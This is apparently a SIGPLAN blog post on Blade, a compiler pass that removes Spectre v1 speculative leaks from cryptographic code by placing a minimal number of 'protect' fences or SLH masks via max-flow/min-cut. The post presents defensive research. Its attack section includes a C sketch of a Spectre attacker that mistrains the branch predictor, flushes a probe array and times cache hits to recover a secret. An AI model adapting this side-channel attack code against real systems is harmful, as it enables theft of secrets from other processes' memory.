Implementing cryptographic algorithms securely is hard. Not only does the code need to be functionally correct, memory-safe, and efficient, but it must also avoid indirectly exposing our secrets through side channels like control flow, memory-access patterns, or execution time. In fact, this is such a hard problem that there's been a lot of recent work on securing cryptographic implementations, e.g., by finding bugs in them, proving them to be secure, or transforming them to be secure.
In January 2018, Spectre attacks threw a wrench into this entire line of work. Spectre demonstrated that speculative execution can reveal cryptographic secrets to attackers, even in code that is secure from “traditional” side channel attacks. With speculative execution, the attacker can trick the processor into temporarily ignoring carefully-placed guards and bounds checks—long enough for the secrets to leak via side-channels. In theory, fence instructions stop speculation and so can eliminate Spectre attacks. In practice, for real cryptographic implementations, it’s not clear where we should insert the fences. To be on the safe side, we could insert fences after every load like Microsoft’s Visual Studio compiler does, but this results in extremely slow code (e.g., on the order of 10×). Alternatively, we could just make educated guesses about where to place fences; this results in fewer fences and faster code, but missing even a single fence can compromise the entire program.
This blog post describes Blade, our fully automatic approach to provably and efficiently eliminate speculative leaks from cryptographic code. Blade is based on a simple insight: To stop leaks via speculative execution, we don’t actually need to stop all speculation. Instead, we only need to cut the data flow from expressions that could speculatively introduce secrets (sources), to expressions that leak them via side-channels (sinks). In this blog post, we give a general overview of Blade and how it works. You can find more details about it in our POPL 2021 Distinguished Paper, or in this 15-minute video.
Speculative Leaks in Cryptographic Implementations
Imagine that our cryptographic library contains this function:
int A[32];
int B[32];

void foo(int i, int j) {
    if (i < 32 && j < 32) {
        int x = A[i];
        int y = A[j];
        int z = x + y;
        int w = B[z];
        ...
    }
}
During normal, sequential execution this function is not a problem: we have bounds checks to prevent the caller from accessing out-of-bounds data (which might contain secrets). However, during speculation, an attacker can exploit this function to leak sensitive data.
To do this, the attacker first has to mistrain the branch predictor so that it predicts the bounds check will pass. For example, the attacker can do this by calling the function repeatedly with in-bounds values for parameters i and j.

After mistraining the branch predictor this way, the attacker manipulates i or j to carefully-chosen out-of-bounds values, such that A[i] or A[j] actually points at some secret data elsewhere in memory. Then, the attacker calls the function again. Because of the mistraining, the processor skips the bounds check and loads A[i] or A[j], putting secret data into x or y.

The secret data in x or y is in turn used to calculate z and then to access B[z]. But this leaks the secret! Even though the processor will discard these values when it discovers the misspeculation, the side effects of the memory accesses persist in the cache. In particular, from the access B[z], the attacker can extract the value of z (the secret) by using cache timing measurements.
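To make the attack concrete, here is a rough, hypothetical sketch of what the attacker's code might look like, using x86 intrinsics and a Flush+Reload-style cache probe. The constants (training count, the out-of-bounds offset SECRET_OFFSET, the timing threshold) are made up for illustration, and a real exploit would also space the probed entries at least a cache line apart; none of this code is from our paper.

#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

extern int A[32];
extern int B[32];
void foo(int i, int j);

#define SECRET_OFFSET 1000          /* hypothetical index s.t. A[SECRET_OFFSET] is secret */
#define CACHE_HIT_THRESHOLD 80      /* illustrative cycle threshold for a cache hit */

int recover_z(void) {
    /* 1. Mistrain the branch predictor with in-bounds arguments. */
    for (int t = 0; t < 1000; t++)
        foo(t % 32, t % 32);

    /* 2. Flush B from the cache so that any later hit must have been
     *    brought in by the victim's speculative access. */
    for (int k = 0; k < 32; k++)
        _mm_clflush(&B[k]);
    _mm_mfence();

    /* 3. Call with an out-of-bounds i: the mispredicted bounds check lets
     *    the processor speculatively load secret data and access B[z]. */
    foo(SECRET_OFFSET, 0);

    /* 4. Probe B and time each access: the entry that comes back fast is
     *    the one the victim touched speculatively, revealing z.
     *    (A real attack spaces probe entries a cache line apart; this
     *    sketch ignores that for brevity.) */
    for (int z = 0; z < 32; z++) {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        volatile int probe = B[z];
        uint64_t elapsed = __rdtscp(&aux) - start;
        (void)probe;
        if (elapsed < CACHE_HIT_THRESHOLD)
            return z;
    }
    return -1;   /* no hit observed; a real attack would retry */
}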
Eliminating Speculative Leaks
To eliminate the leak in this example, we can insert a fence instruction anywhere between the bounds check and w = B[z]. This fence guarantees that everything before it (including the bounds check) finishes executing before anything after it starts executing, even speculatively.
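For instance, assuming an x86 target and the SSE2 intrinsic _mm_lfence() as the fence, the patched function might look like this sketch (the precise fence instruction, and how your compiler exposes it, may differ):

#include <emmintrin.h>   /* _mm_lfence(): x86 load/speculation fence */

int A[32];
int B[32];

void foo(int i, int j) {
    if (i < 32 && j < 32) {
        /* The fence forces the bounds check to resolve before anything
         * after it executes, even speculatively. */
        _mm_lfence();
        int x = A[i];
        int y = A[j];
        int z = x + y;
        int w = B[z];
        (void)w;
        /* ... */
    }
}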
But fences are actually more restrictive than necessary—they stop speculative execution of all the following instructions, not only of the instructions that leak, and so incur unnecessary performance costs.
All we really need is a way to ensure that potentially secret data resulting from speculative loads cannot be leaked. More specifically, we only need to prevent data flows from source expressions which may speculatively load secret data (in this case, A[i]) to sink expressions that leak them through the cache, such as the expression B[z]. To eliminate source-to-sink data flows, we propose a new primitive called protect. This protect does not stop all speculation like fences do. Instead, protect only stops speculation along a particular data-flow path.
Using protect, we can patch the example above by changing the lines defining x and y to:

int x = protect(A[i]);
int y = protect(A[j]);
This ensures that the values assigned to x and y are always the final, nonspeculative values, and thus prevents the dangerous speculation involving incorrect speculative values of x or y. But, crucially, it allows all other speculation (which doesn't involve x or y) to continue, so that the overall performance impact is minimal.
It would be great if future hardware included direct support for protect, for instance through some kind of “fine-grained” fence. In the meantime, we can implement protect using the hardware we have today. We measured two implementations: one implements protect by using a standard x86 speculation fence; the other implements protect by securely masking the load address of the value being protected, a mitigation inspired by speculative load hardening (SLH). This second version is something like a software implementation of the ideal “fine-grained” fence we'd like in hardware. We'll describe our implementations a bit more later.
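To give a feel for the two strategies, here is a hedged sketch of how protect might be expanded for a bounds-checked load on x86. The fence version places a speculation barrier in front of the load; the masking version recomputes the bounds condition as data and uses it to zero out the index, so a load reached under a mispredicted branch cannot touch an out-of-bounds (secret) address. The names protect_fence and protect_mask are ours for illustration; the code Blade actually emits inside Cranelift differs.

#include <stdint.h>
#include <emmintrin.h>   /* _mm_lfence() */

/* Variant 1: protect via a standard x86 speculation fence.
 * The fence makes sure the guarding bounds check has resolved before the
 * load executes, at the cost of stalling all younger instructions. */
static inline int protect_fence(const int *arr, uint64_t idx) {
    _mm_lfence();
    return arr[idx];
}

/* Variant 2: protect via SLH-style address masking (illustrative).
 * The bounds condition is recomputed as data: mask is all-ones when idx
 * is in bounds and all-zeros otherwise, so even if the guarding branch
 * was mispredicted, the speculative load can only reach index 0. */
static inline int protect_mask(const int *arr, uint64_t idx, uint64_t bound) {
    uint64_t mask = -(uint64_t)(idx < bound);   /* branchless: ~0 or 0 */
    return arr[idx & mask];
}

With these, the patched definitions in the example would read something like int x = protect_mask(A, i, 32) (or protect_fence(A, i)), and similarly for y.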
Automatically Repairing Speculative Leaks
Up to this point, we still haven't solved the major problem we identified at the beginning of this post: how to determine where exactly we should place our protect statements (e.g., fences). Blade solves this problem by analyzing the data-flow graph of the program and determining where cuts are needed in order to ensure that potentially-speculatively-secret data can't flow from sources to sinks.
Here’s the relevant part of the data-flow graph for our example program:
We connect the special node T to all expressions which could speculatively result in secret data; we call these sources. In our example program, A[i] and A[j] are sources, because if the bounds check is speculatively bypassed, an attacker could cause those expressions to result in secret data. Likewise, we connect all sinks to the special node S; sinks are expressions that must not be allowed to contain secret data in cryptographic code (e.g., because they are used as memory addresses or branch conditions). In this case, z is a sink, because it is used in a memory address. Our goal is to prevent any data from flowing from sources to sinks; in the graph, this means that we want there to be no path from T to S.
Unfortunately, we can see that this graph contains a path from T to S. This means that our example program is insecure: Secret data could be leaked due to speculative execution.
In order to make the program safe, we need to cut the dataflow from T to S by introducing protect statements. This means that we need to pick some subset of variables in the graph to protect, such that after removing those variables, there is no longer a path from T to S. For instance, we could pick the two variables in the set outlined in orange in the diagram. This cut is safe (no path exists from T to S after removing these variables) but suboptimal: it requires two protect statements. The cut shown in green is much better: it is equally safe, and requires only one protect statement.

Thankfully, the problem of finding a minimal cut is an instance of the classic Max-Flow/Min-Cut problem, which can be solved using efficient, polynomial-time algorithms. Blade uses these algorithms to find a cut containing as few variables as possible and so requiring the fewest protect statements. One could easily imagine optimizations that take into account how many times each instruction is executed, or that try to avoid placing protect statements inside loops; but our experiments show that even the simple model results in only modest performance overheads, as we'll see shortly.
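For readers who want to see the shape of this reduction, here is a small, self-contained sketch (not Blade's actual implementation, which operates on Cranelift's IR) of finding a minimum vertex cut for the example's data-flow graph. Each variable is split into an "in" and an "out" node joined by a capacity-1 edge, ordinary data-flow edges get effectively infinite capacity, and a standard Edmonds-Karp max-flow computation then tells us how many (and which) variables must be protected.

/* Illustrative sketch of the cut-finding step. Variables x, y, z become
 * capacity-1 "in -> out" edges so that min-cut selects whole variables. */
#include <stdio.h>
#include <string.h>

#define N 8
#define INF 1000000

enum { T = 0, X_IN, X_OUT, Y_IN, Y_OUT, Z_IN, Z_OUT, S };

static int cap[N][N];

static void add_edge(int u, int v, int c) { cap[u][v] = c; }

/* One BFS of Edmonds-Karp: find an augmenting path from T to S. */
static int bfs(int parent[N]) {
    int visited[N] = {0}, queue[N], head = 0, tail = 0;
    memset(parent, -1, N * sizeof(int));
    visited[T] = 1; queue[tail++] = T;
    while (head < tail) {
        int u = queue[head++];
        for (int v = 0; v < N; v++)
            if (!visited[v] && cap[u][v] > 0) {
                visited[v] = 1; parent[v] = u; queue[tail++] = v;
                if (v == S) return 1;
            }
    }
    return 0;
}

int main(void) {
    /* Data-flow graph of the example: x and y are defined by the
     * speculative loads A[i] and A[j] (so T feeds them); z = x + y;
     * z reaches the sink address B[z] (so z feeds S). */
    add_edge(X_IN, X_OUT, 1); add_edge(Y_IN, Y_OUT, 1); add_edge(Z_IN, Z_OUT, 1);
    add_edge(T, X_IN, INF);  add_edge(T, Y_IN, INF);
    add_edge(X_OUT, Z_IN, INF); add_edge(Y_OUT, Z_IN, INF);
    add_edge(Z_OUT, S, INF);

    int flow = 0, parent[N];
    while (bfs(parent)) {
        int bottleneck = INF;
        for (int v = S; v != T; v = parent[v])
            if (cap[parent[v]][v] < bottleneck) bottleneck = cap[parent[v]][v];
        for (int v = S; v != T; v = parent[v]) {
            cap[parent[v]][v] -= bottleneck;
            cap[v][parent[v]] += bottleneck;
        }
        flow += bottleneck;
    }
    /* For this graph the max flow (= min cut size) is 1: the cheapest cut
     * is the capacity-1 edge z_in -> z_out, i.e. protect z (the green cut),
     * rather than protecting both x and y (the orange cut). */
    printf("min number of protects needed: %d\n", flow);
    return 0;
}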
Implementation and Evaluation
We implemented Blade as a compilation pass in the Cranelift code-generator for WebAssembly (Wasm). We then evaluated our Blade implementation on a collection of verified constant-time cryptographic functions from CT-Wasm and HACL*.
Across our benchmarks, we found that the version of Blade which uses fences to implement protect incurs an average of 5.0% runtime overhead to protect against Spectre v1 (the first-discovered variant of Spectre). The version of Blade which uses secure masking of load addresses (SLH) does even better, incurring only 1.7% overhead. In contrast, baseline schemes that protect every source in the data-flow graph, rather than finding the min-cut, incur 80.2% overhead (fences) or 19.4% overhead (SLH). You can find a lot more results and analysis in our paper.
Proving Programs Speculatively Secure
We developed a type system in order to prove that programs repaired by Blade are indeed secure from speculative side-channel attacks. In fact, our type system can be used to prove security properties independently of what algorithm is used to insert protect statements: Max-Flow/Min-Cut, manual insertion by the programmer, or even random guessing. If the resulting program is secure according to Blade's rules, our type system will prove it. You can find more details about our type system, and the just-in-time-step semantics we used in the proofs, in our paper.
Conclusion
We’ve described how Blade provides a fully automatic approach to provably and efficiently eliminate speculation-based leakage in unannotated, constant-time cryptographic code. Blade statically detects data flows which could speculatively leak data, and automatically inserts a minimal number of protections (fences or SLH) so that repaired programs are secure and efficient. In the future, we hope to apply the principles behind Blade to protect arbitrary code (and not just constant-time cryptographic code) with the same provable guarantees.
Bio: Craig Disselkoen is a PhD candidate in computer science at UC San Diego, and Marco Vassena is a postdoc at the CISPA-Stanford Center for Cybersecurity.
Disclaimer: These posts are written by individual contributors to share their thoughts on the SIGPLAN blog for the benefit of the community. Any views or opinions represented in this blog are personal, belong solely to the blog author and do not represent those of ACM SIGPLAN or its parent organization, ACM.